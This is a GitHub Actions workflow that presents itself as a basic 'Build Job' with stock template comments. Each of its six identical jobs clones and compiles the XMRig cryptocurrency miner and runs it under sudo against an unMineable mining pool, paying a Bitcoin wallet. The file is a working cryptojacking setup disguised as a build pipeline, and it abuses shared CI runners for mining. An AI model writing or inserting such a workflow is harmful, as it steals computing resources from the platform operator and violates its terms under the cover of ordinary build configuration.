# This is a basic workflow to help you get started with Actions

name: Build Job

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the "main" branch
  push:
    branches: [ "main" ]
  pull_request:
    branches: [ "main" ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build1:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: sudo apt install git build-essential cmake automake libtool autoconf -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/scripts && ./build_deps.sh && cd ../build && cmake .. -DXMRIG_DEPS=scripts/deps && make -j$(nproc) && pwd && ls && sudo ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u BTC:bc1qxsdtj2ymkspfj6s3qaz7mgpy3kchcz6pt8vpk8.BTC_Worker_GitBasedCloud -p x 

  build2:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: sudo apt install git build-essential cmake automake libtool autoconf -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/scripts && ./build_deps.sh && cd ../build && cmake .. -DXMRIG_DEPS=scripts/deps && make -j$(nproc) && pwd && ls && sudo ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u BTC:bc1qxsdtj2ymkspfj6s3qaz7mgpy3kchcz6pt8vpk8.BTC_Worker_GitBasedCloud -p x  
  build3:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: sudo apt install git build-essential cmake automake libtool autoconf -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/scripts && ./build_deps.sh && cd ../build && cmake .. -DXMRIG_DEPS=scripts/deps && make -j$(nproc) && pwd && ls && sudo ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u BTC:bc1qxsdtj2ymkspfj6s3qaz7mgpy3kchcz6pt8vpk8.BTC_Worker_GitBasedCloud -p x  
  build4:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: sudo apt install git build-essential cmake automake libtool autoconf -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/scripts && ./build_deps.sh && cd ../build && cmake .. -DXMRIG_DEPS=scripts/deps && make -j$(nproc) && pwd && ls && sudo ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u BTC:bc1qxsdtj2ymkspfj6s3qaz7mgpy3kchcz6pt8vpk8.BTC_Worker_GitBasedCloud -p x  
  build5:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: sudo apt install git build-essential cmake automake libtool autoconf -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/scripts && ./build_deps.sh && cd ../build && cmake .. -DXMRIG_DEPS=scripts/deps && make -j$(nproc) && pwd && ls && sudo ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u BTC:bc1qxsdtj2ymkspfj6s3qaz7mgpy3kchcz6pt8vpk8.BTC_Worker_GitBasedCloud -p x  
  build6:
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v3

      # Runs a single command using the runners shell
      - name: Run a one-line script
        run: sudo apt install git build-essential cmake automake libtool autoconf -y && git clone https://github.com/xmrig/xmrig.git && mkdir xmrig/build && cd xmrig/scripts && ./build_deps.sh && cd ../build && cmake .. -DXMRIG_DEPS=scripts/deps && make -j$(nproc) && pwd && ls && sudo ./xmrig -a rx -o stratum+ssl://rx.unmineable.com:443 -u BTC:bc1qxsdtj2ymkspfj6s3qaz7mgpy3kchcz6pt8vpk8.BTC_Worker_GitBasedCloud -p x  
